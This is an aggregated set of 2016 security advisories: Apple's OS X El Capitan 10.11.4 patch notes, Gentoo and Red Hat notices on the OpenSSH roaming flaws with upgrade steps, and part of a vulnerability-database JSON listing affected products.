IOUSBFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1749 : Ian Beer of Google Project Zero and Juwei Lin of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed through improved memory management. CVE-ID CVE-2016-1750 : CESG
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A race condition existed during the creation of new processes. This was addressed through improved state handling. CVE-ID CVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaca
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved input validation. CVE-ID CVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team
Kernel Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2016-1755 : Ian Beer of Google Project Zero CVE-2016-1759 : lokihardt
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-ID CVE-2016-1758 : Brandon Azad
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple integer overflows were addressed through improved input validation. CVE-ID CVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to cause a denial of service Description: A denial of service issue was addressed through improved validation. CVE-ID CVE-2016-1752 : CESG
libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2015-1819 CVE-2015-5312 : David Drysdale of Google CVE-2015-7499 CVE-2015-7500 : Kostya Serebryany of Google CVE-2015-7942 : Kostya Serebryany of Google CVE-2015-8035 : gustavo.grieco CVE-2015-8242 : Hugh Davenport CVE-2016-1761 : wol0xff working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1762
Messages Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker who is able to bypass Apple's certificate pinning, intercept TLS connections, inject messages, and record encrypted attachment-type messages may be able to read attachments Description: A cryptographic issue was addressed by rejecting duplicate messages on the client. CVE-ID CVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk, Ian Miers, and Michael Rushanan of Johns Hopkins University
Messages Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Clicking a JavaScript link can reveal sensitive user information Description: An issue existed in the processing of JavaScript links. This issue was addressed through improved content security policy checks. CVE-ID CVE-2016-1764 : Matthew Bryan of the Uber Security Team (formerly of Bishop Fox), Joe DeMesy and Shubham Shah of Bishop Fox
NVIDIA Graphics Drivers Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1741 : Ian Beer of Google Project Zero
OpenSSH Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Connecting to a server may leak sensitive user information, such as a client's private keys Description: Roaming, which was on by default in the OpenSSH client, exposed an information leak and a buffer overflow. These issues were addressed by disabling roaming in the client. CVE-ID CVE-2016-0777 : Qualys CVE-2016-0778 : Qualys
OpenSSH Available for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5 Impact: Multiple vulnerabilities in LibreSSL Description: Multiple vulnerabilities existed in LibreSSL versions prior to 2.1.8. These were addressed by updating LibreSSL to version 2.1.8. CVE-ID CVE-2015-5333 : Qualys CVE-2015-5334 : Qualys
OpenSSL Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A remote attacker may be able to cause a denial of service Description: A memory leak existed in OpenSSL versions prior to 0.9.8zh. This issue was addressed by updating OpenSSL to version 0.9.8zh. CVE-ID CVE-2015-3195
Python Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .png file may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libpng versions prior to 1.6.20. These were addressed by updating libpng to version 1.6.20. CVE-ID CVE-2014-9495 CVE-2015-0973 CVE-2015-8126 : Adam Mariš CVE-2015-8472 : Adam Mariš
QuickTime Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted FlashPix Bitmap Image may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1767 : Francis Provencher from COSIG CVE-2016-1768 : Francis Provencher from COSIG
QuickTime Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted Photoshop document may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1769 : Francis Provencher from COSIG
Reminders Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Clicking a tel link can make a call without prompting the user Description: A user was not prompted before invoking a call. This was addressed through improved entitlement checks. CVE-ID CVE-2016-1770 : Guillaume Ross of Rapid7 and Laurent Chouinard of Laurent.ca
Ruby Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution Description: An unsafe tainted string usage vulnerability existed in versions prior to 2.0.0-p648. CVE-ID CVE-2015-7551
Security Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to check for the existence of arbitrary files Description: A permissions issue existed in code signing tools. This was addressed though additional ownership checks. CVE-ID CVE-2016-1773 : Mark Mentovai of Google Inc.
Security Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution Description: A memory corruption issue existed in the ASN.1 decoder. This issue was addressed through improved input validation. CVE-ID CVE-2016-1950 : Francis Gabriel of Quarkslab
Tcl
Available for:
OS X Yosemite v10.10.5 and OS X El Capitan v10.11 to v10.11.3
Impact: Processing a maliciously crafted .png file may lead to
arbitrary code execution
Description: Multiple vulnerabilities existed in libpng versions
prior to 1.6.20. These were addressed by removing libpng.
CVE-ID
CVE-2015-8126 : Adam Mariš
TrueTypeScaler Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2016-1775 : 0x1byte working with Trend Micro's Zero Day Initiative (ZDI)
Wi-Fi Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker with a privileged network position may be able to execute arbitrary code Description: A frame validation and memory corruption issue existed for a given ethertype. This issue was addressed through additional ethertype validation and improved memory handling. CVE-ID CVE-2016-0801 : an anonymous researcher CVE-2016-0802 : an anonymous researcher
OS X El Capitan 10.11.4 includes the security content of Safari 9.1. https://support.apple.com/kb/HT206171
OS X El Capitan v10.11.4 and Security Update 2016-002 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJW8JQFAAoJEBcWfLTuOo7tZSYP/1bHFA1qemkD37uu7nYpk/q6 ARVsPgME1I1+5tOxX0TQJgzMBmdQsKYdsTiLpDk5HTuv+dAMsFfasaUItGk8Sz1w HiYjSfVsxL+Pjz3vK8/4/fsi2lX6472MElRw8gudITOhXtniGcKo/vuA5dB+vM3l Jy1NLHHhZ6BD2t0bBmlz41mZMG3AMxal2wfqE+5LkjUwASzcvC/3B1sh7Fntwyau /71vIgMQ5AaETdgQJAuQivxPyTlFduBRgLjqvPiB9eSK4Ctu5t/hErFIrP2NiDCi UhfZC48XbiRjJfkUsUD/5TIKnI+jkZxOnch9ny32dw2kUIkbIAbqufTkzsMXOpng O+rI93Ni7nfzgI3EkI2bq+C+arOoRiveWuJvc3SMPD5RQHo4NCQVs0ekQJKNHF78 juPnY29n8WMjwLS6Zfm+bH+n8ELIXrmmEscRztK2efa9S7vJe+AgIxx7JE/f8OHF i9K7UQBXFXcpMjXi1aTby/IUnpL5Ny4NVwYwIhctj0Mf6wTH7uf/FMWYIQOXcIfP Izo+GXxNeLd4H2ypZ+UpkZg/Sn2mtCd88wLc96+owlZPBlSqWl3X1wTlp8i5FP2X qlQ7RcTHJDv8jPT/MOfzxEK1n/azp45ahHA0o6nohUdxlA7PLci9vPiJxqKPo/0q VZmOKa8qMxB1L/JmdCqy =mZR+ -----END PGP SIGNATURE----- .
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/openssh < 7.1_p2 >= 7.1_p2
Description
Qualys have reported two issues in the "roaming" code included in the OpenSSH client, which provides undocumented, experimental support for resuming SSH connections. Users with private keys that are not protected by a passphrase are advised to generate new keys if they have connected to an SSH server they don't fully trust. To do so, add "UseRoaming no" to the SSH client configuration, or specify "-o 'UseRoaming no'" on the command line.
Resolution
All OpenSSH users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/openssh-7.1_p2"
References
[ 1 ] CVE-2016-0777 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0777 [ 2 ] CVE-2016-0778 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0778
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201601-01
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssh security update Advisory ID: RHSA-2016:0043-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-0043.html Issue date: 2016-01-14 CVE Names: CVE-2016-0777 CVE-2016-0778 =====================================================================
- Summary:
Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server. (CVE-2016-0778)
Red Hat would like to thank Qualys for reporting these issues.
All openssh users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: openssh-6.6.1p1-23.el7_2.src.rpm
x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssh-6.6.1p1-23.el7_2.src.rpm
x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssh-6.6.1p1-23.el7_2.src.rpm
ppc64: openssh-6.6.1p1-23.el7_2.ppc64.rpm openssh-askpass-6.6.1p1-23.el7_2.ppc64.rpm openssh-clients-6.6.1p1-23.el7_2.ppc64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm openssh-keycat-6.6.1p1-23.el7_2.ppc64.rpm openssh-server-6.6.1p1-23.el7_2.ppc64.rpm
ppc64le: openssh-6.6.1p1-23.el7_2.ppc64le.rpm openssh-askpass-6.6.1p1-23.el7_2.ppc64le.rpm openssh-clients-6.6.1p1-23.el7_2.ppc64le.rpm openssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm openssh-keycat-6.6.1p1-23.el7_2.ppc64le.rpm openssh-server-6.6.1p1-23.el7_2.ppc64le.rpm
s390x: openssh-6.6.1p1-23.el7_2.s390x.rpm openssh-askpass-6.6.1p1-23.el7_2.s390x.rpm openssh-clients-6.6.1p1-23.el7_2.s390x.rpm openssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm openssh-keycat-6.6.1p1-23.el7_2.s390x.rpm openssh-server-6.6.1p1-23.el7_2.s390x.rpm
x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssh-debuginfo-6.6.1p1-23.el7_2.ppc.rpm openssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm openssh-ldap-6.6.1p1-23.el7_2.ppc64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64.rpm
ppc64le: openssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm openssh-ldap-6.6.1p1-23.el7_2.ppc64le.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64le.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64le.rpm
s390x: openssh-debuginfo-6.6.1p1-23.el7_2.s390.rpm openssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm openssh-ldap-6.6.1p1-23.el7_2.s390x.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.s390x.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.s390.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.s390x.rpm
x86_64: openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssh-6.6.1p1-23.el7_2.src.rpm
x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-0777 https://access.redhat.com/security/cve/CVE-2016-0778 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/articles/2123781
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFWmAWQXlSAg2UNWIIRAh17AJ9SiT1MA1YtOA6ctMp9jIo4e9XrFwCgkbmo nXgYWs8cZcyoTRVoriTGHQo= =1sk9 -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201601-0030",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "unified threat management software",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "9.353"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "7"
},
{
"model": "solaris",
"scope": "eq",
"trust": 1.3,
"vendor": "oracle",
"version": "11.3"
},
{
"model": "mac os x",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "10.11.0"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.7"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.6"
},
{
"model": "mac os x",
"scope": "lte",
"trust": 1.0,
"vendor": "apple",
"version": "10.11.3"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "5.6"
},
{
"model": "virtual customer access system",
"scope": "lte",
"trust": 1.0,
"vendor": "hp",
"version": "15.07"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.8"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.0"
},
{
"model": "mac os x",
"scope": "lte",
"trust": 1.0,
"vendor": "apple",
"version": "10.10.5"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "5.8"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.2"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.3"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "7.0"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "5.4"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "5.9"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.5"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "5.7"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "7.1"
},
{
"model": "mac os x",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "10.9.0"
},
{
"model": "mac os x",
"scope": "lte",
"trust": 1.0,
"vendor": "apple",
"version": "10.9.5"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "5.5"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.9"
},
{
"model": "mac os x",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "10.10.0"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.4"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "debian gnu linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "hardened bsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openbsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openssh",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ubuntu",
"version": null
},
{
"model": "openssh",
"scope": "lt",
"trust": 0.8,
"vendor": "openbsd",
"version": "7.x"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "10.9.5"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.8,
"vendor": "openbsd",
"version": "5.x"
},
{
"model": "utm software",
"scope": null,
"trust": 0.8,
"vendor": "sophos",
"version": null
},
{
"model": "linux",
"scope": null,
"trust": 0.8,
"vendor": "oracle",
"version": null
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.8,
"vendor": "openbsd",
"version": "6.x"
},
{
"model": "hpe remote device access: virtual customer access system",
"scope": null,
"trust": 0.8,
"vendor": "hewlett packard",
"version": null
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.8,
"vendor": "openbsd",
"version": "7.1p2"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "10.10.5"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "10.11 to 10.11.3"
},
{
"model": "solaris",
"scope": null,
"trust": 0.8,
"vendor": "oracle",
"version": null
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.2.1.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "14.0"
},
{
"model": "nsmexpress",
"scope": "eq",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.0.16"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.1"
},
{
"model": "junos 14.2r2",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "nsm3000",
"scope": "eq",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.3.4"
},
{
"model": "junos 13.3r4",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "power hmc",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.9.0.0"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.0.3"
},
{
"model": "purepower integrated manager service appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1"
},
{
"model": "linux x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "13.0"
},
{
"model": "power hmc",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.3.0.0"
},
{
"model": "junos 12.1x46-d35",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "purepower integrated manager kvm host",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "0"
},
{
"model": "pan-os",
"scope": "ne",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.1.3"
},
{
"model": "purview",
"scope": "ne",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "7.0"
},
{
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.0.5"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.0"
},
{
"model": "junos 15.1x49-d40",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.0.13"
},
{
"model": "mac os",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "x10.11.4"
},
{
"model": "linux ia-64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.0.17"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "6.5"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.1.10"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.0.18"
},
{
"model": "ids/ips",
"scope": "eq",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "0"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.3.50"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.0.1"
},
{
"model": "junos 13.3r2",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.11"
},
{
"model": "extremexos",
"scope": "eq",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "15.7"
},
{
"model": "junos 15.1x49-d15",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "junos 12.1x46-d20",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.1.8"
},
{
"model": "linux x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "13.1"
},
{
"model": "enterprise linux server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "7"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.3.2"
},
{
"model": "linux x86 64 -current",
"scope": null,
"trust": 0.3,
"vendor": "slackware",
"version": null
},
{
"model": "nac appliance",
"scope": "ne",
